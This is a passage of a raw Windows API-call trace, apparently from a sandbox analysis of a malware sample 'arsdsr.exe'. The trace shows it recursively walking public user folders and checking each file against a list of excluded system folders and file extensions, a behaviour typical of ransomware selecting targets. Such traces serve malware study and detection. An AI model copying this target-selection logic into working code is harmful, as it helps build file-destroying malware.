lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.719] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.719] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.719] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.719] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.719] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.719] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.719] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Music\\" | out: lpString1="C:/Users\\Public\\Music\\") returned="C:/Users\\Public\\Music\\" [0153.719] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Music\\desktop.ini") returned="C:/Users\\Public\\Music\\desktop.ini" [0153.719] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.719] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.719] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.719] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.719] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.719] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.719] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.719] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.719] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.719] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.719] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0153.719] lstrcmpiW (lpString1="Sample Music", lpString2=".") returned 1 [0153.719] lstrcmpiW (lpString1="Sample Music", lpString2="..") returned 1 [0153.719] lstrcmpiW (lpString1="Sample Music", lpString2="...") returned 1 [0153.719] lstrcmpiW (lpString1="Sample Music", lpString2="windows") returned -1 [0153.720] lstrcmpiW (lpString1="Sample Music", lpString2="$recycle.bin") returned 1 [0153.720] lstrcmpiW (lpString1="Sample Music", lpString2="rsa") returned 1 [0153.720] lstrcmpiW (lpString1="Sample Music", lpString2="ntuser.dat") returned 1 [0153.720] lstrcmpiW (lpString1="Sample Music", lpString2="programdata") returned 1 [0153.720] lstrcmpiW (lpString1="Sample Music", lpString2="appdata") returned 1 [0153.720] lstrcmpiW (lpString1="Sample Music", lpString2="program files") returned 1 [0153.720] lstrcmpiW (lpString1="Sample Music", lpString2="program files (x86)") returned 1 [0153.720] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Music\\" | out: lpString1="C:/Users\\Public\\Music\\") returned="C:/Users\\Public\\Music\\" [0153.720] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\", lpString2="Sample Music" | out: lpString1="C:/Users\\Public\\Music\\Sample Music") returned="C:/Users\\Public\\Music\\Sample Music" [0153.720] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\Sample Music", lpString2="\\" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\") returned="C:/Users\\Public\\Music\\Sample Music\\" [0153.720] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\") returned="C:/Users\\Public\\Music\\Sample Music\\" [0153.720] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\Sample Music\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\*.*") returned="C:/Users\\Public\\Music\\Sample Music\\*.*" [0153.720] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Music\\Sample Music\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0153.722] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.722] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0153.722] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.722] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.722] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x340032, dwReserved1=0x295e9f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.722] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.722] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\") returned="C:/Users\\Public\\Music\\Sample Music\\" [0153.722] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\Sample Music\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\desktop.ini") returned="C:/Users\\Public\\Music\\Sample Music\\desktop.ini" [0153.722] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.722] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.722] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.722] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.722] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.722] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.722] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.722] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.722] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.722] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.722] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0x340032, dwReserved1=0x295e9f0, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".") returned 1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="..") returned 1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="...") returned 1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="windows") returned -1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="$recycle.bin") returned 1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="rsa") returned -1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="ntuser.dat") returned -1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="programdata") returned -1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="appdata") returned 1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="program files") returned -1 [0153.723] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="program files (x86)") returned -1 [0153.723] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\") returned="C:/Users\\Public\\Music\\Sample Music\\" [0153.723] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\Sample Music\\", lpString2="Kalimba.mp3" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned="C:/Users\\Public\\Music\\Sample Music\\Kalimba.mp3" [0153.723] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.723] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.723] PathFindExtensionW (pszPath="Kalimba.mp3") returned=".mp3" [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0153.723] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0153.723] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0x340032, dwReserved1=0x295e9f0, cFileName="Maid with the Flaxen Hair.mp3", cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0153.723] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".") returned 1 [0153.723] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="..") returned 1 [0153.723] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="...") returned 1 [0153.723] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="windows") returned -1 [0153.724] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="$recycle.bin") returned 1 [0153.724] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="rsa") returned -1 [0153.724] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="ntuser.dat") returned -1 [0153.724] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="programdata") returned -1 [0153.724] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="appdata") returned 1 [0153.724] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="program files") returned -1 [0153.724] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="program files (x86)") returned -1 [0153.724] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\") returned="C:/Users\\Public\\Music\\Sample Music\\" [0153.724] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\Sample Music\\", lpString2="Maid with the Flaxen Hair.mp3" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned="C:/Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" [0153.724] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.724] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.724] PathFindExtensionW (pszPath="Maid with the Flaxen Hair.mp3") returned=".mp3" [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0153.724] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0153.724] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x340032, dwReserved1=0x295e9f0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0153.724] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".") returned 1 [0153.724] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="..") returned 1 [0153.724] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="...") returned 1 [0153.724] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="windows") returned -1 [0153.724] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="$recycle.bin") returned 1 [0153.724] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="rsa") returned 1 [0153.724] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="ntuser.dat") returned 1 [0153.725] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="programdata") returned 1 [0153.725] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="appdata") returned 1 [0153.725] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="program files") returned 1 [0153.725] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="program files (x86)") returned 1 [0153.725] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\") returned="C:/Users\\Public\\Music\\Sample Music\\" [0153.725] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\Sample Music\\", lpString2="Sleep Away.mp3" | out: lpString1="C:/Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned="C:/Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" [0153.725] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.725] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.725] PathFindExtensionW (pszPath="Sleep Away.mp3") returned=".mp3" [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0153.725] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0153.725] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x340032, dwReserved1=0x295e9f0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 0 [0153.725] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0153.726] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0153.726] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.726] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="...") returned 1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="$recycle.bin") returned 1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="rsa") returned -1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="ntuser.dat") returned 1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="programdata") returned -1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="appdata") returned 1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="program files") returned -1 [0153.726] lstrcmpiW (lpString1="Pictures", lpString2="program files (x86)") returned -1 [0153.726] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.726] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Pictures" | out: lpString1="C:/Users\\Public\\Pictures") returned="C:/Users\\Public\\Pictures" [0153.726] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:/Users\\Public\\Pictures\\") returned="C:/Users\\Public\\Pictures\\" [0153.727] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\") returned="C:/Users\\Public\\Pictures\\" [0153.727] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Pictures\\*.*") returned="C:/Users\\Public\\Pictures\\*.*" [0153.727] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Pictures\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.727] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.727] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.727] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.727] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.727] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.727] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.727] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\") returned="C:/Users\\Public\\Pictures\\" [0153.727] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Pictures\\desktop.ini") returned="C:/Users\\Public\\Pictures\\desktop.ini" [0153.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.727] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.727] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.727] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.727] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.728] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.728] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.728] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.728] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.728] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2=".") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="..") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", 